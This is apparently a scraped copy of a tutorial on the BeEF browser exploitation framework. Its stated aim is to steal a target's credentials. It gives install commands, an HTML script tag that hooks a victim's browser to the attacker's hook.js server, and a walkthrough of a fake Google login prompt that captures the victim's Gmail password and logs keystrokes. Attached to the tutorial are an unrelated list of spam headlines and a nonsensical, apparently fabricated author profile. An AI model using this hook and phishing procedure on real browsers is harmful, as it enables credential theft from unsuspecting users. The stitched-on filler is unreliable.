BEeF Hacking Framework Tutorial [5 Easy Steps] | GoLinuxCloud (2024)

Table of Contents
Brief Introduction to BEeF Pre-requisites Install SQLite Install Ruby Install Gemfiles Steps to perform BEeF Hacking Step 1: Installing BEeF Step 2: Launching beef hacking framework Step 3: Hooking the target web browser Step 4: Executing commands on the victim’s browser Step 5: Launching a social-engineering attack Summary References

Hello learners, in this guide we will be applying both beef hacking and social engineering to steal credentials from our target’s browser. Man in the browser hacking is very difficult to detect since the attacker will disguise himself as a normal or verified user in order to obtain information either way(from user and from the server). A hacker sits in the middle of the communication channel between the server and the website user.

Brief Introduction to BEeF

The word BEeF stands for Browser Exploitation Framework. It utilizes the client side attack vectors to asses the security level of the target environment. Beef hacking involves hooking one or more web browsers and using them to launch command modules to attack the target system within the browser context. Each browser may have a different set of attack vectors since each is within different security context.

Pre-requisites

  • Have Ruby Installed (version 2.5 or newer)
  • Have Node.js (10 or newer)
  • Have SQLite.
  • Have the gems listed in the Gem file
  • Have Mac OSX 10.5.0 or higher (modern Linux)

Install SQLite

SQLite is a DBMS contained in C library but it is different from other database management systems in that it is not a client-server database engine rather it is embedded in the program. It comes pre-installed on Kali Linux.

Installing SQLite on linux we just need a single command.

sudo apt-get install sqlite3

Install Ruby

Ruby is an opensource and dynamic programming language which is focused on simplicity. It is installed by default on Linux. But in case you find it missing you can install it by running the below command.

sudo apt-get install ruby-full

Install Gemfiles

Gems are ruby files used to extend its applications functionalities. They contains re-usable functions shared among Ruby users. We will install gemfiles using bundler since it makes it easier to install many gems in a single command.

We open a terminal window and run below command to install bundler.

gem install bundler

We start by creating an empty gemfile on our beef-xss root folder and we copy paste the required gems in the gemfile.We then install the required gems from the specified sources using below commands.

$ bundle install$ git add Gemfile Gemfile.lock

NOTE:

As of now, BEeF framework is not yet supported on windows.

Steps to perform BEeF Hacking

With that in mind, let’s jump right into beef hacking.

Step 1: Installing BEeF

BEeF does not come pre-installed on newer versions of Kali Linux (from version 2019.3) but if you update an older version of Kali Linux you will not loose the BEeF framework. But you have to make sure to use “beef-xss” to launch the framework instead of “beef” as it was on earlier version. However, if you had BEeF pre-installed before or you have to install it, the installation command is the same.

sudo apt install beef-xss

Step 2: Launching beef hacking framework

After installing BEef we now move on to the second step which is starting the framework in order to access the user interface and get the hook we need to attack our victim.

sudo beef-xss

On the area in the red box we have two very important things; the we UI - this is the link address from which you will access the user panel of the beef hacking framework and the web-hook - this is a JavaScript script which you need to insert to the vulnerable website in order to hook your victim’s browser in beef hacking.

NOTE:

BEeF default password is and username is “beef:beef”

The web UI should look like the one below

And after logging in we have a view that looks as shown below. From here you can see the hacked browsers both online and offline.

Step 3: Hooking the target web browser

Once we have logged into beef hacking framework UI, we now have to create a hook from which we will be able to attack the victim. The hook script looks like this.

<script src="http://<IP ADDRESS>:3000/hook.js"></script>

Where we have IP you have to replace it with your IP address from where your victim’s browser will hook back to. Beef hacking framework provides for a demo site which can be accessed via

http://127.0.0.1:3000/demos/basic.html

But we will be creating our own HTML file from where will add our hook.

<html> <head> <title>BEEF HACKING</title> <script src="http://127.0.0.1:3000/hook.js"></script> </head> <body> <h1>YOU HAVE BEEN HACKED!!!</h1> </body></html>

We now have to run our HTML file on a web browser.

As you can see we have our victims web browser hooked.

Step 4: Executing commands on the victim’s browser

We now have a beef hacking hook on the victim’s browser and we can execute numerous commands within the beef hacking framework in order to collect important information we may require from the victim’s browser. some of the capabilities available on beef hacking framework are as shown below categorically.

As you can see we have over 100 commands which we can use against the victims’ browsers.

Step 5: Launching a social-engineering attack

In this guide we will try and carry out a social engineering attack on our victim in order to acquire the user’s login details. we just have to select the command we need and execute it.

We will be acquiring the user’s g mail login details. Once we execute the command,the victim will be redirected to a webpage similar to the google login page requiring him/her to her username and password as shown below.

And once the user enters his/her username and password we will be ale to view it right from our beef hacking framework(see image below). After the user clicks the sign in button, he/she will be redirected to the official google sign in page. This aids in making the attack more stealth.

We now have the user’s email username and password. Beef hacking framework also acts as an advanced keylogger and it is able to collect the keys that have been clicked by a victim while using the browser this makes it more dangerous.

Summary

Beef hacking framework is a powerful tool that can be leveraged by systems security professionals to try and design systems especially web apps which are safe for use by the end user. A hacker with the necessary knowledge can also add his own modifications on beef hacking framework to make it more powerful. For example, A hacker can design the login page of any website he needs information from and even customize the URLs of the phishing page to make them look more believable in the eyes of the victim. We as users of the internet, we should avoid visiting malicious and insecure websites to avoid being victims of beef hacking. We should also check the authenticity of web pages which require us to provide them with personal details.

References

Man-in-the-Browser Attacks
Hack Web Browsers with BeEF to Control Webcams, Phish for Credentials & More

Can't find what you're searching for? Let us assist you.

Enter your query below, and we'll provide instant results tailored to your needs.

BEeF Hacking Framework Tutorial [5 Easy Steps] | GoLinuxCloud (2024)
Top Articles
8 Best Stops on the Phoenix to Grand Canyon Drive
How to get from Phoenix to the Grand Canyon
Ukc Message Board
Express Pay Cspire
Conan Foal
Craigslist Carpet Installers
Chris Wragge Illness
Does Teddy Swims Have A Wife? Exploring The Life Of The Rising Star
What is international trade and explain its types?
2014 Can-Am Spyder ST-S
UHD-4K-Monitor mit 27 Zoll und VESA DisplayHDR™ 400 - 27UQ750-W | LG DE
Crystal Lust Wiki
Post-Tribune Obits
Mobile Maher Terminal
Craigslist Cars For Sale By Owner Oklahoma City
El Puerto Harrisonville Mo Menu
Juego Friv Poki
Real Caca Girl Leak
Myworld Interactive American History Pdf
KMST ver. 1.2.178 – Tallahart & the Long Awaited Balance Patch!
What Happened To Zion Judah Satterfield
rochester, NY cars & trucks - craigslist
7 Little Johnstons Alex Died Full Episode
Insulated Dancing Insoles
Dna Profiling Virtual Lab Answer Key
Joanna Gaines Reveals Who Bought the 'Fixer Upper' Lake House and Her Favorite Features of the Milestone Project
Gabrielle Enright Weight Loss
Parent Portal Support | Hamilton-Wentworth District School Board
Claw Machine Random Name Picker
Qcp Lpsg
The 7 Cs of Communication: Enhancing Productivity and Effectiveness
Amarillos (FRIED SWEET PLANTAINS) Recipe – Taste Of Cochin
Game Akin To Bingo Nyt
City Md Flatbush Junction
Codex - Chaos Space Marines 9th Ed (Solo Reglas) - PDFCOFFEE.COM
Corinne Massiah Bikini
Jessica Oldwyn Carroll Update
Elaina Scotto Wedding
Princeton Mn Snow Totals
Opsb Pay Dates
Heffalumps And Woozles Racist
Katie Hamden Of
02488 - Uitvaartcentrum Texel
Download Diablo 2 From Blizzard
Richard Sambade Obituary
Trinity Portal Minot Nd
Power Outage Chehalis
R Warhammer Competitive
Dean Dome Seating Chart With Rows And Seat Numbers
Munich Bavaria Germany 15 Day Weather Forecast
Jetblue Flight Status & Tracker
tweedehands auto kopen in Gilze en Rijen
Latest Posts
Route von Phoenix zum Grand Canyon | via Sedona & Flagstaff
The Ultimate Road Trip Guide: Phoenix to the Grand Canyon
Article information

Author: Twana Towne Ret

Last Updated:

Views: 5964

Rating: 4.3 / 5 (64 voted)

Reviews: 87% of readers found this page helpful

Author information

Name: Twana Towne Ret

Birthday: 1994-03-19

Address: Apt. 990 97439 Corwin Motorway, Port Eliseoburgh, NM 99144-2618

Phone: +5958753152963

Job: National Specialist

Hobby: Kayaking, Photography, Skydiving, Embroidery, Leather crafting, Orienteering, Cooking

Introduction: My name is Twana Towne Ret, I am a famous, talented, joyous, perfect, powerful, inquisitive, lovely person who loves writing and wants to share my knowledge and understanding with you.